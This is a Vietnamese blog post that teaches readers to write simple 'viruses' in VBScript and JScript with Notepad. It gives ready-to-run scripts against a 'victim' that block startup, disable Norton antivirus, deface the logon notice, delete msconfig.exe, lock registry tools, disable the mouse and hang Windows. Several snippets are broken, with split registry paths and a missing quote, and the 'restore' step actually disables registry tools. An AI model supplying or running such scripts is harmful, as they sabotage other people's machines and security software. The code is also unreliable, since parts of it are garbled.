Loading post navigation ...
 
 

Pro page

0
Nhận xét

Tạo virust đơn giản với Notepad hay Wordpad

| by Phan Dũng | views

Hãy nhấn thanks để ủng hộ tác giả

_VBSCRIPT --- _Javascript.

[FD's BlOg] - Chỉ với Notepad hay Wordpad bạn có thể tự tạo cho mình 1 vài "chú" Virus đơn giản dưới dạng _VBSCRIPT hoặc _Javascript.


Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

1. Không cho victim khởi động máy:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2. Disable NAV:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servi c es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"

3. Hiển thị một message mỗi khi reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Wi n Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Ta la anh_hung_bat_dac_di000-Toi den tu HVA"

4. Hiển thị một dòng lệnh khi click vào file hay folder:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Ban da bi toi khong che"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che","I_LOVE_U"

5. Làm cho các trò trên hoạt động bình thường:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\Cu rrentVersion\ "
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Dưới dạng Javascipt :
var wsh;
wsh=new ActiveXObject ("Wscript.shell");

// Winlogon when reboot

var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersio n \\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Ban da bi toi khong che") ;

//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Window s\\CurrentVers ion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");

//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn

var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;

//Shutdown windows
//Disable Mouse

wsh.run ("RUNDLL32.EXE mouse,disable");

//Hang up windows

wsh.run ("rundll32 user,disableoemlayer");


Enter your mail address:

Bài viết chưa có nhận xét nào.☺ Các bạn có thể viết lời bình của mình cho bài viết, và tuân thủ một số quy tắc sau:
» Các bài comment phải nghiêm túc, không dung tục, không spam.
» Nội dung phải liên quan tới chủ đề bài viết.
» Có thể sử dụng thẻ trích dẫn [quote], cấu trúc thẻ như bên dưới :

[quote=AUTHOR name=fdquote]NỘI DUNG[/quote]

» Có thể sử dụng các thẻ <b>,<i>,<a>.


BlOg FD chính thức đóng comment của khách ẩn danh.

BlOg FD.

[▼/▲] More Emoticons
:)) ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Newer Posts Older Posts Home